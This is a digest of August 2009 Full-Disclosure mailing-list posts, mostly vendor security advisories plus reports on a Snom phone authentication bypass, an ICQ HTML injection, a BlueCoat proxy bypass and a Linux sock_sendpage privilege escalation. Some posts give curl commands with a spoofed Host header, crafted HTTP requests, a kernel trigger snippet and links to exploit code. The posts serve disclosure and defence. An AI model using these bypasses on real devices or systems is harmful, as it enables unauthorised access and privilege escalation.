[Full-disclosure] SUSE Security Announcement: subversion (SUSE-SA:2009:044)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:subversion Announcement ID:SUSE-SA:2009:044 Date: Fri, 14 Aug 2009 10:00:00 + Affected Products: openSUSE 10.3 openSUSE 11.0 openSUSE 11.1 SLES SDK 9 SLE SDK 10 SP2 SUSE Linux Enterprise Desktop 10 SP2 SLES 11 DEBUGINFO SLE 11 Vulnerability Type: remote code execution Severity (1-10):8 SUSE Default Package: no Cross-References: CVE-2009-2411 Content of This Advisory: 1) Security Vulnerability Resolved: remote code execution Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: - fetchmail - wget 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion Subversion is a revision control system, which is mainly used for code development. The ibsvn_delta library is vulnerable to integer overflows while processing svndiff streams, this leads to overflows on the heap because of insufficient memory allocation. This bug can be exploited by clients with commit access to cause a remote denial-of-service or arbitrary code execution. It can also be exploited in the other direction from a server to a client that tries to do a checkout or update. 2) Solution or Work-Around Please update. 3) Special Instructions and Notes Please restart a standalone server. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: openSUSE 11.1: http://download.opensuse.org/debug/update/11.1/rpm/i586/subversion-debuginfo-1.5.7-0.1.1.i586.rpm http://download.opensuse.org/debug/update/11.1/rpm/i586/subversion-debugsource-1.5.7-0.1.1.i586.rpm http://download.opensuse.org/update/11.1/rpm/i586/subversion-1.5.7-0.1.1.i586.rpm http://download.opensuse.org/update/11.1/rpm/i586/subversion-devel-1.5.7-0.1.1.i586.rpm http://download.opensuse.org/update/11.1/rpm/i586/subversion-perl-1.5.7-0.1.1.i586.rpm http://download.opensuse.org/update/11.1/rpm/i586/subversion-python-1.5.7-0.1.1.i586.rpm http://download.opensuse.org/update/11.1/rpm/i586/subversion-server-1.5.7-0.1.1.i586.rpm http://download.opensuse.org/update/11.1/rpm/i586/subversion-tools-1.5.7-0.1.1.i586.rpm openSUSE 11.0: http://download.opensuse.org/debug/update/11.0/rpm/i586/subversion-debuginfo-1.5.7-0.1.i586.rpm http://download.opensuse.org/debug/update/11.0/rpm/i586/subversion-debugsource-1.5.7-0.1.i586.rpm http://download.opensuse.org/update/11.0/rpm/i586/subversion-1.5.7-0.1.i586.rpm http://download.opensuse.org/update/11.0/rpm/i586/subversion-devel-1.5.7-0.1.i586.rpm http://download.opensuse.org/update/11.0/rpm/i586/subversion-perl-1.5.7-0.1.i586.rpm http://download.opensuse.org/update/11.0/rpm/i586/subversion-python-1.5.7-0.1.i586.rpm http://download.opensuse.org/update/11.0/rpm/i586/subversion-server-1.5.7-0.1.i586.rpm http://download.opensuse.org/update/11.0/rpm/i586/subversion-tools-1.5.7-0.1.i586.rpm openSUSE 10.3: http://download.opensuse.org/update/10.3/rpm/i586/subversion-1.4.4-30.2.i586.rpm http://download.opensuse.org/update/10.3/rpm/i586/subversion-devel-1.4.4-30.2.i586.rpm http://download.opensuse.org/update/10.3/rpm/i586/subversion-perl-1.4.4-30.2.i586.rpm http://download.opensuse.org/update/10.3/rpm/i586/subversion-python-1.4.4-30.2.i586.rpm http://download.opensuse.org/update/10.3/rpm/i586/subversion-server-1.4.4-30.2.i586.rpm http://download.opensuse.org/update/10.3/rpm/i586/subversion-tools-1.4.4-30.2.i586.rpm Power PC Platform: openSUSE 11.1: http://download.opensuse.org/debug/update/11.1/rpm/ppc/subversion-debuginfo-1.5.7-0.1.1.ppc.rpm
[Full-disclosure] Authentication Bypass of Snom Phone Web Interface
# # # COMPASS SECURITY ADVISORY # http://www.csnc.ch/en/downloads/advisories.html # # # # Product: Snom VoIP/SIP Phones (Snom300, Snom320, Snom360, #Snom370, Snom820) # Vendor:snom technology AG # CVD ID:CVE-2009-1048 # Subject: Authentication Bypass of Snom Phone Web Interface # Risk: High # Effect:Remote # Author:Walter Sprenger # Date: August 13, 2009 # # Introduction: - The VoIP phones of snom technology AG can be configured, monitored or controlled with a browser connecting to the built in web interface. It is strongly recommended to enable authentication on the web interface and to set a strong password. By constructing a specially crafted HTTP request the authentication of the web interface can be completely bypassed. Impact: --- Access to the web interface without authentication enables a malicious user to [2]: - call expensive numbers - listen to the phone conversation by capturing the network traffic - read SIP username and password - read and modify all configuration parameters of the phone - redirect phone calls to another VoIP server - activate the microphone and listen to the conversation in the room Affected: - - The tests have been conducted on a Snom360, Firmware versions: - snom360 linux 3.25/snom360-SIP 6.5.17 - snom360 linux 3.25/snom360-SIP 6.5.18 - snom360-SIP 7.1.30 - snom360-SIP 7.1.35 14552 - All Snom300, Snom320, Snom360, Snom370 and Snom820 with firmware versions below 6.5.20, 7.1.39 and 7.3.14 are vulnerable according to snom technology AG - Not vulnerable: - Firmware version 6.5.20 and higher - Firmware version 7.1.39 and higher - Firmware version 7.3.14 and higher Technical Description: -- The web interface of the Snom VoIP/SIP phones is protected by Basic Authentication or Digest Authentication. The authentication can be completely bypassed by modifying the HTTP request. A normal browser sets the request header Host: to the IP address or the host name that is entered in the URL field of the browser. If the request header is modified to contain the value Host: 127.0.0.1, all pages and functions of the web interface can be reached without prompting the user to authenticate. How to test: curl -H Host: 127.0.0.1 http://IP address of phone/ curl -k -H Host: 127.0.0.1 https://IP address of phone/ - if the phone is vulnerable, the index page of the web interface is returned - if the phone is not vulnerable, an HTTP/1.1 401 Unauthorized response is returned Workaround / Fix: - - Upgrade to firmware version 6.5.20, 7.1.39, 7.3.14 or above - Disable the web interface until a firmware upgrade is installed Timeline: - Vendor Notified: March 19, 2009 Vendor Status: Replied on March 19 and March 30, vulnerability confirmed Vendor Response: Problem fixed in firmware version 7.1.39/7.3.14. Problem will be fixed in version 6. Patch available: Firmware upgrade to versions 6.5.20, 7.1.39, 7.3.14 and above References: --- [1]: http://www.snom.de [2]: http://www.csnc.ch/misc/files/publications/V6_attacking_voip_v1.0.pdf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] http://secreview.blogspot.com -- end of life
Hi Everyone, We received a lot of emails from different people asking us what happened to our blog at http://secreview.blogspot.com. What happened is we decided to shut down operations because we don't have time to keep doing reviews. We also don't have time to redo reviews which is needed to keep the reviews fair. We all have full time jobs and recently have been traveling a lot. We started secreview because we wanted to expose security companies for what they really were. But now because we can't do it any more we don't think its fair that only some companies get reviewed and others don't. So we deleted the blog (but we have 90 days to bring it back if people want it). If we do bring it back, we will probably not do any more reviews and we will leave it up just because. Do people want the blog to be recovered or do they want us to keep it dead? -- Secreview ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1861-1] New libxml packages fix several issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1861-1secur...@debian.org http://www.debian.org/security/ Nico Golde August 13th, 2009 http://www.debian.org/security/faq - -- Package: libxml Vulnerability : several Problem type : local (remote) Debian-specific: no CVE IDs: CVE-2009-2416 CVE-2009-2414 Rauli Kaksonen, Tero Rontti and Jukka Taimisto discovered several vulnerabilities in libxml, a library for parsing and handling XML data files, which can lead to denial of service conditions or possibly arbitrary code execution in the application using the library. The Common Vulnerabilities and Exposures project identifies the following problems: An XML document with specially-crafted Notation or Enumeration attribute types in a DTD definition leads to the use of a pointers to memory areas which have already been freed (CVE-2009-2416). Missing checks for the depth of ELEMENT DTD definitions when parsing child content can lead to extensive stack-growth due to a function recursion which can be triggered via a crafted XML document (CVE-2009-2414). For the oldstable distribution (etch), this problem has been fixed in version 1.8.17-14+etch1. The stable (lenny), testing (squeeze) and unstable (sid) distribution do not contain libxml anymore but libxml2 for which DSA-1859-1 has been released. We recommend that you upgrade your libxml packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17-14+etch1.diff.gz Size/MD5 checksum: 366268 512cbc5adce12b54741cadd80e62eb7d http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17.orig.tar.gz Size/MD5 checksum: 1016403 b8f01e43e1e03dec37dfd6b4507a9568 http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17-14+etch1.dsc Size/MD5 checksum: 716 26bf8a9d037f583d4a9dc1dab5aa4792 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-14+etch1_alpha.deb Size/MD5 checksum: 429312 749dda70c33689b70d13469f6c3357ac http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-14+etch1_alpha.deb Size/MD5 checksum: 233288 02b88e80b91681e956cb4ab19acfeca6 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-14+etch1_amd64.deb Size/MD5 checksum: 223558 ceb0d44c5a6a50373af43359e83667e7 http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-14+etch1_amd64.deb Size/MD5 checksum: 383872 fc52303783696d53c20999a82e962bd7 arm architecture (ARM) http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-14+etch1_arm.deb Size/MD5 checksum: 356830 43860080fa42274a3d7ad649a6dea3fd http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-14+etch1_arm.deb Size/MD5 checksum: 197970 63134af5530d4ab6f1a41046136ea62d hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-14+etch1_hppa.deb Size/MD5 checksum: 429646 938ea12262d6fe02426a8d59f5242794 http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-14+etch1_hppa.deb Size/MD5 checksum: 240036 52f8f7e7c277f0b37fdba7e4b1609f19 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-14+etch1_i386.deb Size/MD5 checksum: 212762 b25bde43ee075fa743b1f037a43919b8 http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-14+etch1_i386.deb Size/MD5 checksum: 364460 0d3f3229b87c1b2d2ff614679d805600 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-14+etch1_ia64.deb Size/MD5 checksum: 498736 7fa5b542dcd264d899ea0b49cdf4ffdc http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-14+etch1_ia64.deb Size/MD5 checksum: 315918 7e2351fbb88e55dcabcd4bbca3bb26c0 mips architecture (MIPS (Big Endian))
[Full-disclosure] ICQ 6.5 HTML-injection vulnerability
ShineShadow Security Report 14082009-08 TITLE ICQ 6.5 HTML-injection vulnerability BACKGROUND With more than 700 million instant messages sent and received every day, ICQ has been known to the online community as a messaging service. Today, a little more than a decade after the first ICQ instant messaging service was launched it has become much more than just that. ICQ is a personal communication tool that allows users to meet and interact through instant messaging services such as text, voice, video and VoIP as well as various entertainment and community products. Source: http://www.icq.com VULNERABLE PRODUCTS ICQ 6.5 build 1042 (latest build) Previous versions and localized distributions may also be affected DETAILS HTML-injection vulnerability exists in official ICQ client software. Incoming message window in the vulnerable ICQ client has a web browser nature. An attacker can try to exploit the vulnerability by sending specially crafted message to the remote ICQ client. The malicious message can contain text data which will be interpreted and displayed in the incoming message window as a HTML code. Potentially an arbitrary HTML code could be injected. There are two impacts of the vulnerability has been detected: 1. Information disclosure For example, an attacker can inject IMG tag that could lead information disclosure (such as remote client’s IP address, browser version, OS version, etc.) 2. Spoofing An attacker can spoof ICQ client software’s system messages, interface elements (buttons, links) in the message window, etc. For example, it could be used for forcing of the ICQ users to click on attacker’s malicious link. Maybe other impacts are possible. EXPLOITATION Remote attacker can exploit this vulnerability using any instant messenger software with OSCAR (ICQ) protocol support by sending specially crafted message. Example of exploit message: file://1/a[HTML CODE] Notice that internal ICQ antispam engine will blocked some text/html data if attacker’s ICQ UIN not in user’s ICQ contact list. DISCLOSURE POLICY The “Full disclosure” policy has been applied. Vendor has not been contacted. CREDITS Maxim A. Kulakov (aka ShineShadow) ss_conta...@hotmail.com _ Celebrate a decade of Messenger with free winks, emoticons, display pics, and more. http://clk.atdmt.com/UKM/go/157562755/direct/01/___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux NULL pointer dereference due to incorrect proto_ops initializations
Tavis Ormandy pisze: Linux NULL pointer dereference due to incorrect proto_ops initializations - Quick and dirty exploit for this one: http://www.frasunek.com/proto_ops.tgz -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE * * Jabber ID: veng...@czuby.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV * ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] http://secreview.blogspot.com -- end of life
Please bring it back. It was a nice blog, or send me an archive of the ut. Thankx ./Chuks On 8/13/09, secrev...@hushmail.me secrev...@hushmail.me wrote: Hi Everyone, We received a lot of emails from different people asking us what happened to our blog at http://secreview.blogspot.com. What happened is we decided to shut down operations because we don't have time to keep doing reviews. We also don't have time to redo reviews which is needed to keep the reviews fair. We all have full time jobs and recently have been traveling a lot. We started secreview because we wanted to expose security companies for what they really were. But now because we can't do it any more we don't think its fair that only some companies get reviewed and others don't. So we deleted the blog (but we have 90 days to bring it back if people want it). If we do bring it back, we will probably not do any more reviews and we will leave it up just because. Do people want the blog to be recovered or do they want us to keep it dead? -- Secreview ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
Title : ByPass a BlueCoat Proxy 8100 Serie (authentification request AND eventually the 3rd party url filtering solution) Date : 14/08/2009 Author : Antoine Santo ** Test one : Try to browse http://www.fcnantes.com/ Result : I need an Account ** GET http://www.fcnantes.com/ HTTP/1.1 Host: www.fcnantes.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive - HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: BASIC realm=ACCES Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Proxy-Connection: close Set-Cookie: BCSI-CS-XXX0302B32A48XXX=2; Path=/ Connection: close Content-Length: 733 HTMLHEAD TITLEAuthentification needed/TITLE /HEADBODY/BODY/HTML ** Test two : i just add a spoofed http header REFERER to a whitelisted (localdatabase) site Result : W00t !! ** GET http://www.fcnantes.com/ HTTP/1.1 Host: www.fcnantes.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Cookie: BCSI-CS-XXX0302B32A48XXX=2 Referer: http://www.mappy.fr - HTTP/1.1 200 OK Date: Fri, 14 Aug 2009 12:41:44 GMT Server: Apache/2.2.3 (Debian) Content-Type: text/html Transfer-Encoding: chunked Proxy-Connection: Keep-Alive Connection: Keep-Alive Age: 0 133f HTML HEAD TITLEfcnantes.com - Site officiel du FC Nantes/TITLE meta name=description content=Actualit. du Footbal snip /HTML *** By the way, http://www.fcnantes.com/ is not even allowed by the url filter with my legal account ;) *** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Is it working on all versions ? Le 14 août 09 à 15:10, anto...@santo.fr a écrit : Title : ByPass a BlueCoat Proxy 8100 Serie (authentification request AND eventually the 3rd party url filtering solution) Date : 14/08/2009 Author : Antoine Santo -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.12 (Darwin) iEYEARECAAYFAkqFdYwACgkQbd20JnyNpPQabwCfZ4/0226HqLuMR6x9uFEvCNbi MKoAniYMMuW6KpaHq/kRPx7RXdwavyV3 =1hNq -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
** Test two : i just add a spoofed http header REFERER to a whitelisted (localdatabase) site Result : W00t !! ** Can you elaborate on, to a whitelisted (localdatabase) site? None of the rules defined in the Web Authentication Layer or Web Access Layer have a whitelist attribute. In the list of available actions for the Web Authentication Layer there's: Do Not Authenticate, ForceAuthenticate1 and Deny. In the Web Access Layer list of available actions there are a couple dozen options, none of which are labeled whitelist or whitelisted. Also, I'm not sure what you mean by localdatabase. Internal http traffic shouldn't hit the proxies... Using an 8100-C with SG05 5.2.4.3. -Guy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] nullpointer fix question
hi! Should this fix work against the nullpointer linux kernel vulnerability? Should it break any services on a usual LAMP machine? thx, ps: sorry i lost the header for original message maxigas So, here's the contents of disabled-protocols . # these networking protocols are not needed on this server install net-pf-3 /bin/true # Amateur Radio AX.25 install net-pf-4 /bin/true # Novell IPX install net-pf-5 /bin/true # AppleTalk DDP install net-pf-6 /bin/true # Amateur Radio NET/ROM install net-pf-8 /bin/true # ATM PVCs install net-pf-9 /bin/true # Reserved for X.25 project install net-pf-10 /bin/true # IP version 6 install net-pf-11 /bin/true # Amateur Radio X.25 PLP install net-pf-12 /bin/true # Reserved for DECnet project install net-pf-13 /bin/true # Reserved for 802.2LLC project install net-pf-18 /bin/true # Ash install net-pf-19 /bin/true # Acorn Econet install net-pf-20 /bin/true # ATM SVCs install net-pf-22 /bin/true # Linux SNA Project (nutters!) install net-pf-23 /bin/true # IRDA sockets install net-pf-24 /bin/true # PPPoX sockets install net-pf-25 /bin/true # Wanpipe API Sockets install net-pf-26 /bin/true # Linux LLC install net-pf-30 /bin/true # TIPC sockets install net-pf-31 /bin/true # Bluetooth sockets On the servers where I really care about security, I disable most networking protocols by installing the attached file as: /etc/modprobe.d/disabled-protocols [Note that this file disables IPv6.] It's safest to reboot after installing this file, in case any of the networking-protocol modules have already been inserted into the kernel. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] nullpointer fix question
maxigas maxi...@anargeek.net wrote: hi! Should this fix work against the nullpointer linux kernel vulnerability? It looks incomplete, I don't see PF_ISDN or PF_IUCV, for example. But this general approach looks fine, and is actually what Red Hat have reccommended to their customers. https://bugzilla.redhat.com/show_bug.cgi?id=516949#c10 Obviously if you don't use redhat, you should check what else your distribution provides. Should it break any services on a usual LAMP machine? If you know you don't need PF_INET6, then it should be fine. You would most likely know if you needed the others. Thanks, Tavis. -- - tav...@sdf.lonestar.org | finger me for my pgp key. --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
From: Sebastien gioria s...@gioria.org Is it working on all versions ? Tested version : - Software version: SGOS 5.2.4.14 Proxy Edition ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:202 ] memcached
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:202 http://www.mandriva.com/security/ ___ Package : memcached Date: August 14, 2009 Affected: 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in memcached: Multiple integer overflows in memcached 1.1.12 and 1.2.2 allow remote attackers to execute arbitrary code via vectors involving length attributes that trigger heap-based buffer overflows (CVE-2009-2415). This update provides a solution to this vulnerability. Additionally memcached-1.2.x has been upgraded to 1.2.8 for 2009.0/2009.1 and MES 5 that contains a number of upstream fixes, the repcached patch has been upgraded to 2.2 as well. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2415 ___ Updated Packages: Mandriva Linux 2009.0: 9d4d42fe76af248132f829d160495adc 2009.0/i586/memcached-1.2.8-0.1mdv2009.0.i586.rpm d53cac61eb5aa89846b8cd7916c5a758 2009.0/SRPMS/memcached-1.2.8-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: ba6a1444fcfcce618ec84cbc6d46f109 2009.0/x86_64/memcached-1.2.8-0.1mdv2009.0.x86_64.rpm d53cac61eb5aa89846b8cd7916c5a758 2009.0/SRPMS/memcached-1.2.8-0.1mdv2009.0.src.rpm Mandriva Linux 2009.1: a996c0c7afdc057fa23a60d9bdc3f5d0 2009.1/i586/memcached-1.2.8-0.1mdv2009.1.i586.rpm 2864ec90f52b817534c36e680ebd924f 2009.1/SRPMS/memcached-1.2.8-0.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 64a9462f4a36f128c1025531985b44a6 2009.1/x86_64/memcached-1.2.8-0.1mdv2009.1.x86_64.rpm 2864ec90f52b817534c36e680ebd924f 2009.1/SRPMS/memcached-1.2.8-0.1mdv2009.1.src.rpm Corporate 4.0: 630916635aa2bb9d4f34b7b16a5b9636 corporate/4.0/i586/memcached-1.1.12-4.2.20060mlcs4.i586.rpm 079b93b62379d4ba632eba013675ead3 corporate/4.0/SRPMS/memcached-1.1.12-4.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 89c891eb8c1543762ec8606fab339ed1 corporate/4.0/x86_64/memcached-1.1.12-4.2.20060mlcs4.x86_64.rpm 079b93b62379d4ba632eba013675ead3 corporate/4.0/SRPMS/memcached-1.1.12-4.2.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 96b5ff9995f32f06dc16ac4568694926 mes5/i586/memcached-1.2.8-0.1mdvmes5.i586.rpm 4a6050639b2ef47a686c9571bfafbec9 mes5/SRPMS/memcached-1.2.8-0.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 5873483ba54835638044efee0e8d2898 mes5/x86_64/memcached-1.2.8-0.1mdvmes5.x86_64.rpm 4a6050639b2ef47a686c9571bfafbec9 mes5/SRPMS/memcached-1.2.8-0.1mdvmes5.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKhX8ImqjQ0CJFipgRAoDGAJ4vt5jtckDM1+BLAwvk1RDNc4RlMwCfVcf+ f96rWeMUdAJnRxsj5d9lAn4= =PKA2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
** Test two : i just add a spoofed http header REFERER to a whitelisted (localdatabase) site Result : W00t !! ** Antoine, Would you mind sharing the policy (on the bluecoat) you're referring to for www.mappy.fr? What is the Action for that host or IP set to? You mentioned whitelisted but that could mean anything from the list of options in the policy manager. Thanks, Guy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Mr. Magorium's Wunderbar Emporium
For those who have been living under a rock for the past two days, an exploit exists for Julien Tinnes/Tavis Ormandy's sendpage vulnerability in all Linux kernels since 2001. My exploit works on 2.4, 2.6, x86, x64, 4k stacks, 8k stacks, with/without cred framework, bypasses mmap_min_addr in any public way possible (auto-detecting which method to use). As always, while in ring0 it provides the added convenience of disabling auditing, SELinux, AppArmor, and all other LSM modules. If SELinux is enforcing, it will also rewrite the SELinux code to fool userland into thinking it remains in enforcing mode. And if the machine supports it, it'll play a nice video for you in your terminal. See http://www.youtube.com/watch?v=arAfIp7YzZ4 for a demo. I wanted to implement a more interactive sense of russian roulette in the exploit, with a randomly-generated 1 in 6 chance of hot rebooting the machine into FreeDOS (first exploit to reboot you into a secure operating system) but I don't have time -- I'm off to Miami! Congrats Linus on screwing over all the vendors and every Linux user by forcing disclosure of the bug before vendors could ship out updated kernels. Your patch applies well to their binary packages. -Brad signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux NULL pointer dereference due to incorrect proto_ops initializations
Excellent catch! This bug report has been sited from many places now. Thanks to Tavis Ormandy and Julien Tinnes. -- Soo-Hyun (s.c...@hackers.org.uk) On Thu, Aug 13, 2009 at 19:57, Tavis Ormandytav...@sdf.lonestar.org wrote: Linux NULL pointer dereference due to incorrect proto_ops initializations - In the Linux kernel, each socket has an associated struct of operations called proto_ops which contain pointers to functions implementing various features, such as accept, bind, shutdown, and so on. If an operation on a particular socket is unimplemented, they are expected to point the associated function pointer to predefined stubs, for example if the accept operation is undefined it would point to sock_no_accept(). However, we have found that this is not always the case and some of these pointers are left uninitialized. This is not always a security issue, as the kernel validates the pointers at the call site, such as this example from sock_splice_read: static ssize_t sock_splice_read(struct file *file, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { struct socket *sock = file-private_data; if (unlikely(!sock-ops-splice_read)) return -EINVAL; return sock-ops-splice_read(sock, ppos, pipe, len, flags); } But we have found an example where this is not the case; the sock_sendpage() routine does not validate the function pointer is valid before dereferencing it, and therefore relies on the correct initialization of the proto_ops structure. We have identified several examples where the initialization is incomplete: - The SOCKOPS_WRAP macro defined in include/linux/net.h, which appears correct at first glance, was actually affected. This includes PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25 and PF_AX25 families. - Initializations were missing in other protocols, including PF_BLUETOOTH, PF_IUCV, PF_INET6 (with IPPROTO_SCTP), PF_PPPOX and PF_ISDN. Affected Software All Linux 2.4/2.6 versions since May 2001 are believed to be affected: - Linux 2.4, from 2.4.4 up to and including 2.4.37.4 - Linux 2.6, from 2.6.0 up to and including 2.6.30.4 Consequences --- This issue is easily exploitable for local privilege escalation. In order to exploit this, an attacker would create a mapping at address zero containing code to be executed with privileges of the kernel, and then trigger a vulnerable operation using a sequence like this: /* ... */ int fdin = mkstemp(template); int fdout = socket(PF_PPPOX, SOCK_DGRAM, 0); unlink(template); ftruncate(fdin, PAGE_SIZE); sendfile(fdout, fdin, NULL, PAGE_SIZE); /* ... */ Please note, sendfile() is just one of many ways to cause a sendpage operation on a socket. Successful exploitation will lead to complete attacker control of the system. --- Mitigation --- Recent kernels with mmap_min_addr support may prevent exploitation if the sysctl vm.mmap_min_addr is set above zero. However, administrators should be aware that LSM based mandatory access control systems, such as SELinux, may alter this functionality. It should also be noted that all kernels up to 2.6.30.2 are vulnerable to published attacks against mmap_min_addr. --- Solution --- Linus committed a patch correcting this issue on 13th August 2009. http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=e694958388c50148389b0e9b9e9e8945cf0f1b98 --- Credit --- This bug was discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team. -- - tav...@sdf.lonestar.org | finger me for my gpg key. --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html 